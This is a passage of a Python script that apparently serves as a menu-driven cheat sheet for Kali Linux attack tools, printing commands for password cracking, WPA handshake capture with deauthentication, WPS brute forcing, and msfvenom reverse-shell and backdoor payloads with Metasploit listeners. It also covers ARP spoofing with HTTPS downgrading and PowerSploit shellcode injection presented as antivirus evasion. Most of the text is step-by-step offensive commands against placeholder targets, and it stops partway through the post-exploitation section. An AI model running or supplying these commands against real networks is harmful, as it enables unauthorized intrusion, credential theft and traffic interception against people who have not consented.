		print(colored('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'red'))
		print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'red'))
		print('\n')

		if App4 == "1":
			print(colored("cewl -h", 'green'))
			print('^ Prints Out The Help Menu ^ \n')
			print(colored("cewl https://www.<website.com/>", 'green'))
			print('^ Spiders The URL To A Defined Depth And Prints A List Of Terms That Can Be Used As A Dictionary To Crack Password. ^ \n')
			print(colored("cewl https://www.<website.com/> -w  <Name Of Wordlist>.txt", 'green'))
			print('^ Save Generated Wordlist As A .txt File ^ \n')
			print(colored("cewl https://www.<website.com/> -m <Number Of Charecters>", 'green'))
			print('^ Creates A Wordlist Thats At Least <x> Charecters Long ^ \n')
			print(colored("cewl https://www.<website.com/> -n -e", 'green'))
			print('^ This Retrieves An Email(s) From The Given Website. -e: Unlocks The Email Parameter. -n: Hides List Of Words Created While Crawling. ^ \n')
			print(colored("cewl https://www.<website.com/> -c", 'green'))
			print('^ Counts How Many Times A Word Appears On A Webpage ^ \n')
			print(colored("cewl https://www.<website.com/> -d 3", 'green'))
			print('^ This Will Increase The Spider Depth, The Higher The Number, The More Words It Will Generate. By Default The Number Is 2. ^ \n')
			print(colored("cewl https://www.<website.com/> --debug", 'green'))
			print('^ This Can View Issues And Raw Websites Information While Crawling ^ \n')
			print(colored("cewl -d 2 -m 5 -w <Name Of Wordlist>.txt https://www.<website.com/>", 'green'))
			print('^ Crawl A Depth Of 2 With A Minimum Of 5 Charecters. And The Result Saves To A .txt ^ \n')


		elif App4 == "2":
			print(colored("crunch <min Charctors> <max Charectors> 0123456789 -o wordlist.txt", 'green'))
			print('^  generates a wordlist consisting of numbers given min-max amount of charectors, and saves the result to a txt file ^ \n')
			print(colored("crunch 2 3 -f /usr/share/rainbowcrack/charset.txt", 'green'))
			print('^  This Generates A File Using Rainbow Charset File ^ \n')
			print(colored("crunch 10 10 -t manav^%%%%", 'green'))
			print('^  To Generate A Wordlist with a Specific Pattern ^ \n')
			print('comma(,) for all uppercase letters | at(@) for all lowercase letters | percentage(%) for numerical | Up Arrow(^) For All Special Charectors')
			print(colored("crunch 1 10 -p Hello Manav", 'green'))
			print('^ Generates Wordlist With A Permutation of Words and/or Charectors ^ \n')
			print('\n')
			print(colored("crunch 10 10 -t @@@@@@@%%% | aircrack-ng -w - -b <bssid> <cap-file-name>.cap", 'green'))
			print('^ This Is So You Dont Need A Wordlist, This Will Test All Possible Letter And Number Combos According To -t Configuration ^')
			print('^ Aircrack-ng Is Specifically Made To BruteForce WPA/WPA2 Keys ^ \n')

		elif App4 == "3":
			print(colored("echo -n 'Word1ToHash' | md5sum | tr -d *_*>>Dictionary_hashes.txt", 'green'))
			print('^ Just To Test This Program, Replace Word1ToHash With A More Common Password ^ \n')
			print(colored("hashcat -m 500 -a 0 Done.txt Dictionary_hashes.txt /path/to/wordlist.txt", 'green'))
			print('^  This Command Will Attempt To Crack The Hash Given Its Wordlist and Saves Cracked Hash to "Done.txt" ^ \n')

		elif App4 == "4":
			print(colored("john -h", 'green'))
			print('^ Prints The Help Menu ^ \n')
			print(colored("john --wordlist=</path/to/wordlist.txt --rules <Hashed Passwords Name>.txt", 'green'))
			print('^ Provide A Path To Wordlist, As Well As The Document With The Hashed Passwords (In This Example, Be In The Same Folder/Directory As The Hash) ^ \n')
			print(colored("sipdump -h", 'green'))
			print('^ Listens To Interface On Network For Logins And Saves Discoveries To A File ^ \n')
			print(colored("bitlocker2john -h", 'green'))
			print('^ You Will Need An Image Of Encrypted Memory, Once You Have That You Can Start Cracking ^ \n')
			print(colored("bitlocker2john -i <image of encrypted memory>", 'green'))
			print('^ This All You Will Need To Type In. ^ \n')
			print(colored("keepass2john -h", 'green'))
			print('^ You Will Need The Keyfile And A ".kdbx database(s)" In Order To Use This ^ \n')
			print(colored("rar2john -h", 'green'))
			print('^ All You Need For This Is The Password Locked RAR File ^ \n')
			print(colored("unshadow -h", 'green'))
			print('^ Combines Password And Shadow Files ^ \n')
			print(colored("wpapcap2john -h", 'green'))
			print('^ Converts Pcap Or Ivs2 Files To JohnTheRipper Format ^ \n')
			print(colored("wpapcap2john -c -e <essid:mac> <Pcap Or Ivs2 File Name>.pcap/.ivs2", 'green'))
			print('^ This Will Complete Auths, Incomplete Ones May Be Wrong Pass, But We Can Crack What Pass Were Tried ^ ')
			print('^ In Case The File Lacks Beacons, Add The "-e <essid:mac>" Parameter. ^ \n')
			print(colored("zip2john -h", 'green'))
			print('^ Cracks Locked Zip Files ^ \n')

		elif App4 == "5":
			print(colored("medusa -h <IP Address> -u <username> -P <path/to/wordlist> -M <module to execute (ssh,ftp,etc.)> -n <port number wrt to module>", 'green'))
			print('^  this command is a bruteforce attack ^ \n')
			print(colored("medusa -d", 'green'))
			print('^ This Lists Available Modules ^ \n')
		elif App4 == "6":
			print(colored("ncrack", 'green'))
			print('^ This Lists All The Modules It Provides ^ \n')
			print(colored("ncrack ftp://<IP Address>", 'green'))
			print('^  This Is Considered A Basic Attack  ^ ')
			print('^ We Know That The FTP Port(21) Is Open, So We Pretty Much Tell Ncrack To Try And Find Out Possible FTP Login Credentials ^ \n')
			print(colored("ncrack -user msfadmin -P pass.txt <IP Address>:<Port Number>", 'green'))
			print(colored("ncrack -U user.txt -pass msfadmin <IP Address>:<Port Number>", 'green'))
			print(colored("ncrack -U user.txt -P pass.txt <IP Address>:<Port Number>", 'green'))
			print('  ^  These Are Dictionary Attacks  ^')
			print('^ Situation 1-  Know Only The Username But Dont Know The Password ^')
			print('^ Situation 2-  Dont Know The UserName But Know The Password ^')
			print('^ Situation 3-  Neither Have Username Nor The Password ^ \n')
			print(colored("ncrack -user msfadmin,ignite -oass msfadmin,123 ftp://<IP Address>", 'green'))
			print(colored("ncrack -user msfadmin,ignite =pass msfadmin,123 <IP Address>/24:21", 'green'))
			print('^ Situation 1-This Is A Bruteforce Attack, You Pretty Much List Every Possible Credential Information And Test Every Combination ^ ')
			print('^ Situation 2-Will Brufteforce Every Connected Device With Given Username And Password ^ \n')
			print(colored("nacrack -v --pairwise <IP Address>:21", 'green'))
			print('^ This Uses Its Own Deault Dictionary For Pairing Passwords For Anonymous Login ^ \n')
			print(colored("ncrack --resume /root/.ncrack/restore.<Date>", 'green'))
			print('^ If An Interuption Happens, This Will Pick You Up Right Where You Left Off. The Format For Date Input Is "YEAR-MM-DD_HH-MM" ')
			print('^ 				It Goes Year-Month-Day_Hour-Minutes			 	       ***2020-01-30_04-36 ^ \n')
			print(colored("ncrack -v --pairwise <IP Address>:<Port Number> -f", 'green'))
			print('^ This Will Stop The Program Right After Success ^ \n')
			print(colored("ncrack ssh://<IP Address1> ssh://<IP Address2> -sL", 'green'))
			print('^ Obtain Result In List Format, All You Really Need Is The "-sL" Parameter Added To Command ^ \n')
			print(colored("ncrack -U user.txt -P pass.txt <IP Address2>:<Port Number> <IP Address1>:<Port Number> -oN normal", 'green'))
			print(colored("cat normal.txt", 'green'))
			print('^ The Output Format Puts Credentials Into A Normal Text File. When You Run, Look In Your Current Directory And See 2 New Directories. ^ \n')
			print(colored("ncrack -U user.txt -P pass.txt <IP Address>:<Port Number> -oN normal normal.txt --append-output", 'green'))
			print('^ This Command Appends The File If It Already Exists ^ \n')
			print(colored("ncrack -U user.txt -P pass.txt <IP Address>:<Port Number> --nsock-trace 2", 'green'))
			print('^ Lets You Run Nsock Trace On Our Target While Attacking It, We Can Set The Trace Level From 0-10. Pending On Our Objective ^ \n')
			print(colored("ncrack -U user.txt -P pass.txt <IP Address>:<Port Number> -T1", 'green'))
			print('^ This Is A Timing Template. "T1" Can Be Changed To 4 Other Speeds. By Defualt The Speed Is At 3. ^')
			print('^ T1:Sneaky Scan  |  T2:Polite Scan  |  T3:Normal Scan  |  T4:Aggresive Scan  |  T5:Insane Scan  ^ \n')
			print(colored("\n cl (min connection limit) \n CL (max connection limit) \n at (authentication tries) \n cd (connection delay) \n cr (connection retries) \n to (time-out) ", 'green'))
			print('^ Service Specific Options ^ \n')
			print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'magenta'))
			print('		Target Specification	\n')
			print(colored("nmap -sV -p21 <IP Address> -oX nmap.xml", 'green'))
			print(colored("cat nmap.xml", 'green'))
			print(colored("ncrack -user <Username> -pass <Password> -iX nmap.xml", 'green'))
			print('^ Input From Nmaps XML, If You Didnt Know Nmap scans Your Local Network ^ \n')
			print(colored("ncrack -U <filename>.txt -P <filename>.txt -iL <hostName>.txt -p21", 'green'))
			print('^ If You Save A .Txt File With A List Of Host IP Address Inside Of It, It Will Save You Time Writing Each One Out ^ \n')
			print(colored("ncrack -U <userFile>.txt -P <Passfile>.txt -iL <HostNames>.txt -p21 --exclude <IP Address>", 'green'))
			print('^ This Excludes A Specific IP Address Not To Scan ^ \n')



		elif App4 == "7":
			print(colored("Go To Applications --> Password Attacks --> Ophcrack", 'green'))
			print('^ This Is How To Access Ophcrack ^ \n')
			print(colored("Select 'Load' And Choose The Enrypted SAM You Are Trying To Crack", 'green'))
			print(colored("Once Thats Done, Click On Tables, And Load 'Vista Free' Table", 'green'))
			print(colored("Now That Everything Is Set, Press On The Crack Option", 'green'))

		else:
			return


#////////////////////////////////////DONE////////////////////////////DONE//////////////////////////////////////////////////////////////////////////////////
#################################       	WIRELESS  ATTACKS		##########################################################
	elif number == "6":
		print(colored("1. aircrack-ng: WEP/WPA/WPA2 Cracking Tool", 'blue'))
		print(colored("2. reaver: Forces Exchange Of Keys Using WPS", 'cyan'))
		print(colored("3. wifite: Attacks WEP/WPA/WPA2/WPS Encrypted Networks", 'blue'))
		print(colored("4. kismet: Network Detector And Packet Sniffer", 'cyan'))
		print(colored("5. pixiewps: Faster WPS Attack", 'blue'))
		print(colored("6. asleap: Actively Recover LEAP/PPTP Passwords", 'cyan'))

		App5 = input("What Application Do You Want To Use: ")
		print(colored('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'red'))
		print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'red'))
		print('\n')



		if App5 == "1":
			print('You Will Need A Network Adapter, A Good Company Is ALFA. If You Have One Please Continue')
			print(colored("ifconfig", 'green'))
			print('^ See If Your Adapter Is Running And What InterFace Its Using (wlan0, wlan1, etc.) ^')
			print('In This Example Ill Use Wlan0 As The Interface \n')
			print(colored("airmon-ng start wlan0", 'green'))
			print('^ This Enables Monitor Mode ^\n')
			print(colored("airmon-ng check kill", 'green'))
			print('^ This Will Make Sure Nothing Will Interfere With The Adapter ^ \n')
			print(colored("airodump-ng wlan0mon", 'green'))
			print('^ This Will List Available Networks(BSSID), Channel(CH), And More..')
			print('Once We Find A Network You Would Like To Target, Copy the BSSID/MAC Address And Remember The Channel(CH) its on ^ \n')
			print('In A New Terminal Window Run Command Below, Dont Close Out Of Any Other Terminal Windows')
			print(colored("airodump-ng -c <channel> -w Kali -bssid <xx:xx:xx:xx:xx:xx> wlan0mon", 'green'))
			print('^ This Will Monitor That Selected Network For Connected Devices That Are Active As Well Saves Results Called "Kali" ^ \n')
			print('Open A New Terminal Window Without Closing Any Previous Windows')
			print(colored("aireplay-ng --deauth 100 -a <xx:xx:xx:xx:xx:xx> -c <xx:xx:xx:xx:xx:xx> wlan0mon", 'green'))
			print('^ This Deauthenticats The Given -a <BSSID> To Capture A 4-Way Handshake With A Connected Device -c <Clients mac> On Target Network ^ \n')
			print('A Few Files Will Be Dumped After Getting Handshake')
			print(colored("aircrack-ng -w /path/to/wordlist.txt dumpFile.cap", 'green'))
			print('^ This Performs A Dictionary Attack On Dumped .cap file. Once Completed, You Should Have The Password. Otherwise, Try A Different Wordlist ^ \n')

		elif App5 == "2":
			print(colored("reaver -h", 'green'))
			print('^ This Displays The Help Menu ^ \n')
			print(colored("airmon-ng start <interface>", 'green'))
			print('^ Start Wireless Interface In Monitor Mode, Well Be Using "wlan0" As Our Interface In These Examples ^ \n')
			print(colored("wash -i mon0", 'green'))
			print('^ Use "wash" To Display Netwoks With WPS Enabled (Sometimes Its Unable To Detect Networks :/ ^ \n')
			print(colored("airodump-ng mon0", 'green'))
			print('^ This Will Show All The Networks Aroud You ^ ')
			print('^ What You Need To Continue Is The BSSID Sequence In Order To Continue ^ \n')
			print(colored("reaver -i mon0 -b <BSSID Number> -vv", 'green'))
			print('^ All You Need To Do Is Run This Command And Reaver Will Attack The Network For You ^')
			print('^ This May Take A Few Hours To Complete ^ \n')
			print(colored(" * Once Completed * ", 'yellow'))
			print('^ It Will Display WPS Pin ^ ')
			print('^ As Well As The Networks Password ^')
			print('^ It Will Be Displayed Under "WPA PSK: <Network Password>" ^ \n')
			print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n", 'magenta'))
			print(colored("A Different Option Is To Get The 'PKE, PKR, e-hash 1 & e-hash 2, E-nonce / R-nonce and the authkey'", 'yellow'))
			print(colored("reaver -i wlan0mon -b <BSSID> -vv -S -c <AP Channel>", 'green'))
			print('^ Running This Command Will Do So, This Information Is Used For A PixieWPS Attack ^ ')

		elif App5 == "3":
			print(colored("wifite -h", 'green'))
			print('^This Prints The Help Menu ^ \n')
			print(colored("Go To Applications --> Wireless Attacks --> Wifite", 'green'))
			print('^ This Is The Path To The Application ^ \n')
			print(colored("wifite --dict </path/to/wordlist.txt> --kill", 'green'))
			print('^ This Is To Start The Attack ^ \n')
			print(colored("(Ctrl + C) <Number Of Target You Want To Attack>", 'green'))
			print('^ After Choosing Target, Wifite Will Run Various Types To Perform To Get Into Targets Network ^ \n')

		elif App5 == "4":
			print(colored("kismet -h", 'green'))
			print('^ This Displays The Help Menu ^ \n')
			print(colored("To Get GUI Interface For Kismet, Follow These Steps..", 'yellow'))
			print('............................................................................ \n')
			print(colored("git clone https://kismetwireless.net/git/kismet.git", 'green'))
			print(colored("cd kismet", 'green'))
			print(colored("./configure", 'green'))
			print(colored("make", 'green'))
			print(colored("sudo make suidinstall", 'green'))
			print(colored("sudo usermod -a -G kismet <username on computer>", 'green'))
			print('.............................................................................................. \n')
			print(colored("airmon-ng start <Card Name>", 'green'))
			print('^ This Puts Card In Monitor Mode, If Interface Your Using Is "wlan0", Than The Card Name Would Be "wlan0mon ^ ')
			print('^ In These Examples Well Just Be Using wlan0mon ^ \n')
			print(colored("kismet -c wlan0mon", 'green'))
			print('^ -c Defines The Capture Source ^ \n')
			print(colored("* A List Of Networks Will Come Up, Its Advised That You Choose One That Has A Strong Signal Strength *", 'yellow'))
			print('^ Upon Highlighting Your Target, A List Of Clients Will Appear In The Main Menu. (Those Clients Are Associated With That Network ^ \n')
			print(colored("Click On Windows --> Client List", 'green'))
			print('^ This Will Provide Even Further Details Of Each Client Thats Connected In Real-Time ^ \n')
			print(colored(" Click On Kismet(top left corner) --> Config Channel", 'green'))
			print('^ This Is If You Wish To Create A Persistent Network Surveillance ^ ')
			print('^ In The Configuration Window, Select "Lock" And Than Enter The Number Of The Channel You Want To Monitor ^ \n')

		elif App5 == "5":
			print(colored("pixiewps -h", 'green'))
			print('^ This Prints Out The Help Menu ^ \n')
			print(colored("* This Is Used With Reaver * \n", 'yellow'))
			print(colored("airmon-ng start <Card Name>", 'green'))
			print('^ Use The Reaver Section As Reference {Catagory: "6" --> Application: "2"} ^ \n')
			print('^ Once You Gathered The Required Information, Continue On.. ^ \n')
			print(colored("pixiewps -e <PKE>  -S", 'green'))
			print(colored("pixiewps -e <PKE> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S", 'green'))
			print(colored("pixiewps -e <PKE> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S", 'green'))
			print(colored("pixiewpd -e <PKE> -r <PKR> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>", 'green'))
			print('^ All Thats Listed Above Are Different Methods Of Performing This Attack ^ \n')
		elif App5 == "6":
			print(colored("asleap -h", 'green'))
			print('^ This Displays The Help Menu ^ \n')
			print(colored("genkeys -r /path/to/wordlist.txt -f <fileName1>.dat -n <FileName2>.idx", 'green'))
			print('^ Generates Lookup File For Asleap ^ \n')
			print(colored("asleap -r leap.dump -f <FileName1>.dat -n <FileName2>.idx -s", 'green'))
			print('^ Reads A Capture File With Provided File And Skips The Authentication Check ^ \n')


		else:
			return


#///////////////////////////////////DONE/////////////////////////////DONE///////////////////////////////////////////////////////////////////////////////////
################################		EXPLOITATION  TOOLS		#############################################
	elif number == "7":
		print(colored("1. crackmapexec", 'blue'))
		print(colored("2. metasploit framework", 'cyan'))
		print(colored("3. msf payload creater", 'blue'))
		print(colored("4. searchsploit", 'cyan'))
		print(colored("5. routersploit", 'blue'))
		print(colored("6. wfuzz", 'cyan'))

		App6 = input("What Application Do You Want To Use: ")
		print(colored('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'red'))
		print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'red'))
		print('\n')

		if App6 == "1":
			print(colored("crackmapexec smb <IP Address>/24", 'green'))
			print('^ Maps The Network Quickly And Saves Results To A Database ^ \n')
			print(colored("crackmapexec smb <IP Address>/24 -u <Username> -p <path/to/wordlist>", 'green'))
			print('^ This Uses Provided Credentials And Sees If The Username Can Login To Device And Sees If The Username Has Any Local Admin Rights ^ \n')
			print(colored("crackmapexec smb <IP Address>/24 -u Administrator -H <LM_hash_value:NTLM_hash_value>", 'green'))
			print('^If Device Doesnt Have Admin Rights, But You Do Have The Administrator Username And Password, Run The Same Code Except Change The Username And Include LM And NTLM Hash Values ^ \n')
		elif App6 == "2":
			print(colored("msfvenom -h | msfconsole -h", 'green'))
			print('^ You Will Be Working With Both Of These For Payload(malware) Creation And Listening For A Connection ^ \n')
			print(colored("msfvenom -p windows/meterpreter/reverse_tcp lhost <IP Address> lport <Port Number> -f exe > <filename>.exe", 'green'))
			print('^ There Are Many Different Types Of Payloads, When You Have Discovered A Vulnerability, You Should Create The Payload Accordingly ^ ')
			print('Type Out "msfvenom -l payloads" To View The Options That Are Available. "msfvenom -l <module>" Also works For "encoders, encrypt, auxiliaries, etc" \n')
			print(colored("msfvenom  -a x64_x86 --platform windows -p windows/meterpreter/bind_tcp  lhost <IP Address> lport <Port Number> -f exe > <filename>.exe", 'green'))
			print('^ With This You Are Specifying The Architecture And The Platform, You Are Also Using A Bing Shell. The Difference Between A Reverse Shell And A Bing Shell Is.... ^')
			print('Bind Shell = Target Machine Listens And Waits For You To Connect(They Installed Your Payload And You Just Need To Connect To It)')
			print('Reverse Shell = You Listen And Wait For Target To Connect To You(They Installed Your Payload, As Soon As They Run It, You Should Have A Connection) \n')
			print(colored("msfconsole", 'green'))
			print('^This Starts Up Metasploit-Framework ^ \n')
			print(colored("use multi/handler", 'green'))
			print(colored("set lhost <IP Address>", 'green'))
			print(colored("set lport <Port Number>", 'green'))
			print(colored("run", 'green'))
			print('^These Are The Steps To Set Up Your Listener For A Connection. Be Sure To Use The Same IP Address And Port Number Of When You Created The Payload With msfvenom ^ \n')
			print('This Is A Long Lesson, Feel Free To Dig In Further If You Want To Know About Its Full Capabilities')

		elif App6 == "3":
			print(colored("bash msfpc.sh -h", 'green'))
			print('^ This Lists All The Commands Available To Program ^ \n')
			print(colored("bash msfpc.sh windows <IP Address>", 'green'))
			print('^ Makes A Windows Payload(backdoor) ^ \n')
			print(colored("./msfpc.sh elf bind wlan0 4444 verbose", 'green'))
			print('^ Makes A Linux Payload(backdoor) with a manual interface(wlan0) and port(4444) ^ \n')
			print(colored("msfpc stageless cmd py tcp", 'green'))
			print('^ Makes A Python Payload(backdoor) With Interactive IP Menu ^ \n')
			print(colored("./msfpc.sh loop wan", 'green'))
			print('^ Makes One Of Everything ^ \n')
		elif App6 == "4":
			print(colored("searchsploit -h", 'green'))
			print('^ This Prints Out The Help Menu ^ \n')
			print(colored("searchsploit -u", 'green'))
			print('^ This Updates Searchsploit ^ \n')
			print(colored("searchsploit -t <windows> <oracle>", 'green'))
			print('^ This Looks For Exploits That Are Related To These Two Terms ^ \n')
			print(colored("searchsploit -p <Exploit Name>", 'green'))
			print(colored("searchsploit -m <Exploit Name>", 'green'))
			print('^ First Line Copies Exploit To Clipboard ^')
			print('^ Second Line Copies The Exploit To Working Directory ^ \n')
			print(colored("searchsploit <Exploit Name> -examine", 'green'))
			print('^ This Command Will Study The Exploit You Are Looking Into ^ \n')

		elif App6 == "5":
			print(colored("search scanner", 'green'))
			print('^ Lists Built-In Scanners in RouterSploit ^ \n')
			print(colored("use scanners/routers/router_scan", 'green'))
			print('^ Selects Scanner From Built-In List ^ \n')
			print(colored("show options", 'green'))
			print('^ Lists Available Options ^ \n')
			print(colored("set target <ipAddr>", 'green'))
			print('^ Selects Target with given IP Address ^ \n')
			print(colored("run", 'red'))
			print('^ Runs The Scanner ^ \n')
			print('\n')
			print(colored("use scanners/autopwn", 'green'))
			print('^ If Vulnerabilities Were Found Select This Module Above ^ \n')
			print(colored("run", 'red'))
			print('^ Runs An Exploit Against Router Automatically ^ \n')
			print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'magenta'))
			print('		BruteForce    Method		\n')
			print(colored("use creds/routers/fortinet/ftp_default_creds", 'green'))
			print(colored("set target <IP Address>", 'green'))
			print(colored("set defaults file: ///PathToWordlist.txt", 'green'))
			print(colored("run", 'red'))
		elif App6 == "6":
			print(colored("wfuzz -h", 'green'))
			print('^ This Prints Out The Help Menu ^ ')
			print('^ You Will Need To Go To A Website You Wish To Attack And See What Parameters They Use For Username And Password ^ \n')
			print(colored("wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -d 'username=admin&password=FUZZ' -u <Target URL>", 'green'))
			print('^ This Will Allow You To Bruteforce The Website ^ \n')


		else:
			return




#####################################		SNIFFING  &  SPOOFING		##########################################################################
	elif number == "8":
		print(colored("1. bettercap", 'blue'))
		print(colored("2. macchanger", 'cyan'))
		print(colored("3. netsniff-ng", 'blue'))
		print(colored("4. responder", 'cyan'))

		App7 = input("What Application Do You Want To Use: ")
		print(colored('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'red'))
		print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'red'))
		print('\n')

		if App7 == "1":
			print(colored("bettercap -iface <interface>", 'green'))
			print('^ This Starts Up Bettercap Interface Can Be "wlan0" Or "eth0" ^\n')
			print(colored("help", 'green'))
			print('^ This Lists All The Modules Associated With Bettercap ^\n')
			print(colored("help <module>", 'green'))
			print('^This Provides Details About That Module ^\n')
			print(colored("help arp.spoof", 'green'))
			print('^ This Can Be Really Helpful!! ^\n')
			print(colored("set arp.spoof.fullduplex true", 'green'))
			print('^ This Is To Execute The full-duplex Mode On Both Your Machine And Targets Machine ^\n')
			print(colored("set arp.spoof.targets <ip address of target>", 'green'))
			print('^ This Sets The Target(s) You Are Trying To Perform The MITM Attack On ^\n')
			print(colored("arp.spoof on", 'green'))
			print('^ This Activates/Executes Arp Spoofing ^\n')
			print(colored("help net.sniff", 'green'))
			print('^ This Provides You Details On The Sniffing Modules ^\n')
			print(colored("net.sniff on", 'green'))
			print('^ This Enables The Sniffing Mechanism To Run ^\n')
			print(colored("caplets.show", 'green'))
			print('^ This Lists A Variety Of Different Small Programs Bettercap Comes With ^\n')
			print(colored("hstshijack/hstshijack", 'green'))
			print('^ VERY IMPORTANT!! This Downgrades HTTPS Traffic To HTTP, Makes It So Reading Activity On Network More Readable ^\n')
			print(colored("All Done! Bettercap Should Be Running Fine!", 'green'))

		elif App7 == "2":
			print(colored("macchanger -h", 'green'))
			print('^ This Prints Out The Help Menu ^\n')
			print(colored("macchanger -r <interface>", 'green'))
			print('^ The Interface You Will Need To Choose From Will Be Either "wlan0"  and/or "eth0" ^\n')

		elif App7 == "3":
			print(colored("netsniff-ng", 'green'))
			print('^ This Runs The Program From Terminal ^ \n')
			print(colored("netsniff-ng --in eth0 --out netsniff.pcap --silent --bind-cpu 0", 'green'))
			print('^ This Silently Sniffs Network And Saves Results To A .pcap File ^ \n')
			print(colored("netsniff-ng --in netsniff.pcap", 'green'))
			print('^ If You Want To View Captured Packets, Run The Command Above ^ \n')

		elif App7 == "4":
			print(colored("responder -I eth0 -w -r -f", 'green'))
			print('^ This  Is The Basic Command To Run This Tool ^ \n')
			print(colored("enum4linux -a -u “user” -p “password” <IP server>", 'green'))
			print('^  If You Get A Username And Password And Crack Their Hash You Can Use The Command Above To Perform Enumeration ^ \n')

		else:
			return


#################################		POST  EXPLOITATION		####################################################################
	elif number == "9":
		print(colored("1. powersploit", 'blue'))
		print(colored("2. mimikatz", 'cyan'))
		print(colored("3. weevely", 'blue'))
		print(colored("4. powershell empire", 'cyan'))

		App8 = input("What Application Do You Want To Use: ")
		print(colored('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'red'))
		print(colored("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", 'red'))
		print('\n')

		if App8 == "1":
			print(colored("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^", 'magenta'))
			print(colored("			Evading AntiVirus  \n", 'yellow'))
			print(colored("Go To Applications --> Maintain Access --> Powersploit", 'green'))
			print('^ This Will Bring You To The /usr/share/powersploit Directory In Terminal. ^ \n')
			print(colored("ls -l", 'green'))
			print('^ This Will List Everything In The Directory ^ \n')
			print(colored("cd CodeExecution", 'green'))
			print(colored("ls -l", 'green'))
			print('^ After Typing Out  These Commands, Well Be Working With "Invoke-Shellcode.ps1" ^ \n')
			print('You Now Will Need To Start Up A Web Server. Go To "/usr/share/powersploit"')
			print(colored("python -m SimpleHTTPServer", 'green'))
			print('^ This Command Will Start A Server Within Powersploit ^ \n')
			print(colored("On Target Machine Go To Start Menu --> Type Out 'Powershell' --> Press Enter", 'green'))
			print(colored("Keep Powershell Open And Open Browser And Navigate To Our Web Server. <IP Address>:<Port Number>", 'green'))
			print('^ This Will Accept A Connection Between Computers. Now We Need To Start Up msfconsole. Once Started... ^ \n')
			print(colored("use exploit/multi/handler", 'green'))
			print(colored("set payload/windows/meterpreter/reverse_http", 'green'))
			print(colored("set lhost <IP Address>", 'green'))
			print(colored("set lport <Port Number>", 'green'))
			print(colored("exploit", 'green'))
